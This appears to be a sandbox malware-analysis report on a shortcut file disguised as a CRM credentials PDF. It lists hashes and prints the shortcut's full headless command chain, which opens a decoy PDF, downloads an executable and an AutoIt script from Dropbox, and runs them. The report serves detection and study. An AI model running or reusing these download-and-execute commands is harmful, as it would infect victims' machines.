|
Hash | Hash Value |
|---|---|
| MD5 | d9b3d1df47a4544ecc605f60b30d6060
|
| Sha1 | b78861c648a71e4639071d70397ee9365414435e
|
| Sha256 | b570834a38ff9d5e085dc48700332e536635d23e7cfb9b93fe65be1ffb85e0f7
|
| Sha384 | cea6375abd9ecb361a5c2508ae1d370e001ed6f3ae13d9d43e139f35faffe841d873479addb23203a5998165da4e1af0
|
| Sha512 | 50889f2d38771c4d18b1f8bd3617949f75db2259793cc9a5a1d7e94daea8dd04297dbc6d20659ab21c57ed2cd4be0e3bc459021bb476518fc1c3507963cb6661
|
| SSDeep | 48:9oxKCip9v8QkeovLchXTWARl7p5NUZv63QXHHjLuGmA3N:6xKCKZ8NXqWE/tcHH13N
|
| TLSH | 3A41298996D42068EAEB9370B93A4E81CA7332F4F636F00432482CC16AAE14D065FA5D
|
|
Name | Value |
|---|---|
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" https://www.dropbox.com/scl/fi/av1dqynlgpsbj7y4h11hr/WealthGAF_CRM_API_Credentials.pdf?rlkey=bxiufllo2bgannsp48hdx8dqp^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x |
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" https://www.dropbox.com/scl/fi/qtq8fi6lbzso0qk3hdnr5/WealthGAF_CRM_API_Documentation.pdf?rlkey=0e8aukx0avwk028s7dxib1ib7^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x |
|
Name | Value | Location |
|---|---|---|
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" https://www.dropbox.com/scl/fi/av1dqynlgpsbj7y4h11hr/WealthGAF_CRM_API_Credentials.pdf?rlkey=bxiufllo2bgannsp48hdx8dqp^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Credentials.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x Malicious |
d9b3d1df47a4544ecc605f60b30d6060 > WealthGAF_CRM_API_Credentials.pdf.lnk |
| LNK: Command Execution | conhost.exe --headless -- cmd.exe /c curl.exe -L -o "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" https://www.dropbox.com/scl/fi/qtq8fi6lbzso0qk3hdnr5/WealthGAF_CRM_API_Documentation.pdf?rlkey=0e8aukx0avwk028s7dxib1ib7^&dl=1 & start "" "%USERPROFILE%\Documents\WealthGAF_CRM_API_Documentation.pdf" & curl.exe -L -o "C:\Users\Public\a.exe" https://www.dropbox.com/scl/fi/0063nq3gemmruffc77oum/a_1782998350_4587.exe?rlkey=6h8c8anx4qqqdr284fma25fy0^&dl=1 & curl.exe -L -o "C:\Users\Public\P.a3x" https://www.dropbox.com/scl/fi/dwsl2oin75cucbk3xgj27/P_1782998350_4587.a3x?rlkey=c3mm1rx1i5visse8u8wtbt0wp^&dl=1 & cd /d "C:\Users\Public" & a.exe P.a3x Malicious |
d9b3d1df47a4544ecc605f60b30d6060 > WealthGAF_CRM_API_Documentation.pdf.lnk |